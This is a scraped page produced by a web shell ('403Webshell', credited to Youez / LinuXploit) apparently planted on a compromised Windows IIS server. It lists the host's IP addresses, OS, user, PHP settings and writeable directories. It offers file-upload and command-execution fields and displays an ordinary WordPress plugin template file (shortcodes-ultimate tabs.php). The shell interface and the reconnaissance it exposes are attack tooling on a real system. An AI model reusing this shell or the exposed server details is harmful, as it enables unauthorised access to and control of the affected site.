403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.127
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /inetpub/wwwroot/engineering/wp-content/plugins/shortcodes-ultimate/admin/partials/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /inetpub/wwwroot/engineering/wp-content/plugins/shortcodes-ultimate/admin/partials/tabs.php
<?php defined( 'ABSPATH' ) or exit; ?>

<?php $current_tab = $this->get_current_tab(); ?>

<div class="su-admin-tabs nav-tab-wrapper wp-clearfix">

	<?php foreach( $this->get_tabs() as $tab_id => $tab_title ) : ?>

		<?php if ( $tab_id === $current_tab ) : ?>
			<a href="<?php echo $this->get_tab_url( $tab_id ); ?>" class="nav-tab nav-tab-active"><?php echo $tab_title; ?></a>
		<?php else : ?>
			<a href="<?php echo $this->get_tab_url( $tab_id ); ?>" class="nav-tab"><?php echo $tab_title; ?></a>
		<?php endif; ?>

	<?php endforeach; ?>

</div>

Youez - 2016 - github.com/yon3zu
LinuXploit